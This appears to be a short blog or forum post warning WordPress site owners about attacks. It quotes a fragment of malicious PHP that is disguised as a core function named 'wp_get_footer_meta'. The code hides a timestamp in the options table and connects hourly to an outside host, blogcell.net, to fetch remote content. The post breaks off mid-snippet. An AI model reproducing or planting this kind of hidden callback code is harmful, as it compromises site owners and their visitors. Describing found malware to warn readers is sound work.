Specific Exploits
Malicious crackers don't care who you are. They prey and feed on the fact that you think you're so meaningless that you'll never be targeted. I came across this one exploit that was really interesting. Someone went to some great lengths to get this poor victim. Code: function wp_get_footer_meta() { global $wpdb; if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'")) $adwb_opt = unserialize($adwb_opt); else { $adwb_opt = array( 0, '' ); $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '" . serialize($adwb_opt) . "', 'no')"); } if ((time() - $adwb_opt[0]) >= 3600) { $adwb_host = 'blogcell.net'; $adwb_get = '/wpam/'; $adwb_soc = @fsockopen($adwb_host, 80, $_en, $_es, 30); ...